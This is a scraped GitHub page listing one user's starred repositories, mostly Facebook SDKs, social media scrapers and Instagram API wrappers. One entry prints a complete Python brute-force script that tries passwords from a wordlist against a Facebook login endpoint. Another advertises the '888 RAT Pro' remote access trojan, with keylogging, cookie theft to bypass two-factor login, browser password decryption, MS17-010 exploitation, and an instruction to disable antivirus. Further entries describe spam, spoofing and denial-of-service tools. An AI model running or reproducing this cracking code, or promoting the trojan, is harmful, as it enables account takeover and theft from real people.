kevinyuvietnam's starred repositories


Used to integrate the Facebook Platform with your iOS & tvOS apps.



Used to integrate Android apps with Facebook Platform.



😎 A bot which scrapes almost everything about a facebook user's profile including uploaded photos, tagged photos, videos, friends list and their profile photos (including Followers, Following, Work Friends, College Friends etc) and all public posts/statuses available on the user's timeline.



🤖 Top-rated tools to scrape all major sections from Facebook, Instagram and Twitter including posts (likes/comments), photos/videos, contact informations, followers, following and much more.



Scrape public and private photos from Instagram profiles without using the official API.



Bruteforce attack on Facebook account using python script



Regular expression matching for URL's. Maintained, safe, and browser-friendly version of url-regex. Resolves CVE-2020-7661 for Node.js servers.



RESTful API Wrapper for Instagram Private API



NodeJS Instagram private API SDK. Written in TypeScript.


Fb-cracker - Facebook Brute Force # -*- coding: utf-8 -*- ## import os import sys import urllib import hashlib API_SECRET = "62f8ce9f74b12f84c123cc23437a4a32" __banner__ = """ +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ |#Author: DedSecTL <dtlily> | |#Contact: Telegram @dtlily | |#Date: Fri Feb 8 10:15:49 2019 | |#This tool is made for pentesting. | |#Changing the description of this tool | |Won't made you the coder !!! | |#Respect Coderz | |#I take no responsibilities for the | | use of this program ! | +=======================================+ |..........Facebook Cracker v 1.........| +---------------------------------------+ """ print("[+] Facebook Brute Force\n") userid = raw_input("[*] Enter [Email|Phone|Username|ID]: ") try: passlist = raw_input("[*] Set PATH to passlist: ") if os.path.exists(passlist) != False: print(__banner__) print(" [+] Account to crack : {}".format(userid)) print(" [+] Loaded : {}".format(len(open(passlist,"r").read().split("\n")))) print(" [+] Cracking, please wait ...") for passwd in open(passlist,'r').readlines(): sys.stdout.write(u"\u001b[1000D[*] Trying {}".format(passwd.strip())) sys.stdout.flush() sig = "api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail={}format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword={}return_ssl_resources=0v=1.0{}".format(userid,passwd.strip(),API_SECRET) xx = hashlib.md5(sig).hexdigest() data = "api_key=882a8490361da98702bf97a021ddc14d&credentials_type=password&email={}&format=JSON&generate_machine_id=1&generate_session_cookies=1&locale=en_US&method=auth.login&password={}&return_ssl_resources=0&v=1.0&sig={}".format(userid,passwd.strip(),xx) response = urllib.urlopen("{}".format(data)).read() if "error" in response: pass else: print("\n\n[+] Password found .. !!") print("\n[+] Password : {}".format(passwd.strip())) break print("\n\n[!] Done .. !!") else: print("fbbrute: error: No such file or directory") except KeyboardInterrupt:



Read an Android app's certificate and print it's MD5, SHA1, and Facebook key hash. For verification and educational use



Bruteforce attack for Instagram



Requires Python2 (Linux) ``` apt-get install python2 ``` ``` git clone ``` ``` chmod +x ``` ``` ./ ``` Features ====== ##### BruteForce SRKAKASHI uses Selenium to automatically input passwords into a website ##### GeoLocation Gelocation allows the user to pin point the exact location of the ip address ##### Sms Spam Uses gmail to spam sms ##### Spoof Email Sends anonymous emails ##### Check If Website Exists Mercury checks if the website is real ##### Check if Website Is Down Checks if websites status is online or offline ##### Encode Strings Into Hash Form Encodes your text into hash form ##### Hex Encode/Decode Encodes and decodes hex strings ##### Whats My Ip & Mac shows mac and ip address ##### Spam email spams email in While True loop ##### Download Extra Tools Download an extra 16 tools like hydra, metasploit and nmap ##### Github Cloner & Pip Intsaller Installs Pips and Github repos ##### Website Cloner Extracts the source code from a website ##### Ip Address From Website Finds ip address from website ##### nmap Nmap must be pre installed and its somewhat glitchy on linux ##### Port Listen Listens to ports #### DOS dos attack via packets ##### AnonWebbrowser Loads up Chrome, with a proxy ##### Google Dorks Finds vulrnable links ##### Admin Pannel Helps find the admin pannel to a website ##### Websites Access some of the best hacking & robotoics websites. ##### Proxy Scraper Find the best Us proxys! ##### Twitter Info Grab Grab a twitter users basic info



[Cracker Password] - Brute Force Facebook in messenger ,inc



888 RAT Pro Options : File Manager Remote Desktop Web cam capture Sound capture Get password (all last browser 2 method – microsoft and Downloader and Outlook) proccess Manager remote Cmd Online Keylogger Form graber log + images remote chat download and execut Upload and execut Open Url UAC exploit Delete Cookis (chrome + firefox) Speaker ( Virus speak what you write ) outluk Delete Profile and pass open cd and close 888 RAT Pro Browser Support : Firefox Internet Explorer Google Chrome Chrome Canary/SXS CoolNovo Browser Opera Browser Apple Safari Flock Browser SeaMonkey Browser SRWare Iron Browser Comodo Dragon Browser 888 RAT Pro Email Support : Microsoft Outlook Express Microsoft Outlook 2002/XP/2003/2007/2010/2013 Mozilla Thunderbird Windows Live Mail 2012 IncrediMail Opera Mail The Bat! Foxmail v6.x – v7.x Windows Live Messenger MSN Messenger Google Talk GMail Notifier PaltalkScene IM Pidgin (Formerly Gaim) Messenger Miranda Messenger BUG Fixes ( First of all update your old users with new Rat server , if you not update you will find problems ) 888 RAT Pro v1.0.9 Improvement List : 1 - Add label explain features in builder area 2 - Fix scanner davices bug display ip 3 - deleted hid instalation becose some system not run server in startup becose folder is hiden 4 - Now you can use Ms17-10 Not just LAN but WAN also mean via wirless 5 - Add in server area a auto change from system to user previlage without upload server &amp; run as user for exploit MS17-010 ( so faster ) 6 - Add Cookis Stealer in password area , now you able to have any session just with steal &amp; inject cookies to your brwoser , no pass , no grab the good that you can bypass 2FA autentification &amp; not need user or a password , also work any website for browser Chrome Firfox &amp; Opera (Native) 7- Add Browser Decrypter for [ Chrome , Opera ] All vesion in password area (Native) 8 - Add in rat client a Arp scanne method on Ms17-010 it is fast mthod to scanne a network the first method was ping scanne now we have tow methods 9 - Add in Ms17-010 scanner custome range from to in the past was num 1 also add label to know self ip in lan network 10 - Replaced old FireFox get pass with new one fast &amp; stable ( same way as old just improuved ) 11 - Some bug fix and delete show ip in duckdns &amp; no-ip updaters for security reasons &amp; improuve hiden info in option area 12 - Add search option on cookies stealer . 13 - Message manager i am prouved now it is a list view with all messages logs 14 - Added new persistence method Schtasks ( we keep old vbs method ) now tow method avalible 15 - Remove server from Zone.Identifier in install , the warn message of windows when you run server detected as unknow app (in install only ) 16 - Add detect target time &amp; self ip on the machin in scanner MS17_010 17 - Change No ip updater from hiden execution to execut via browser (not hiden) more stable becose som browser block update in hidden mode 18 - Add Regedit Manager in windows system area explore files , add value , delete value , Decode value type Binary and Base64 and CryptProtectData 19 - Fix GetObject Error for Speaker in funny area also for Get Av name. 888 RAT Pro Installation Note : Always Disable Your Antivirus Before Using RAT Install Java JRE And Java JDK If Not Installed Yet Always Bind Apk With Server



📷 Instagram Bot - Tool for automated Instagram interactions



Metasploit Framework
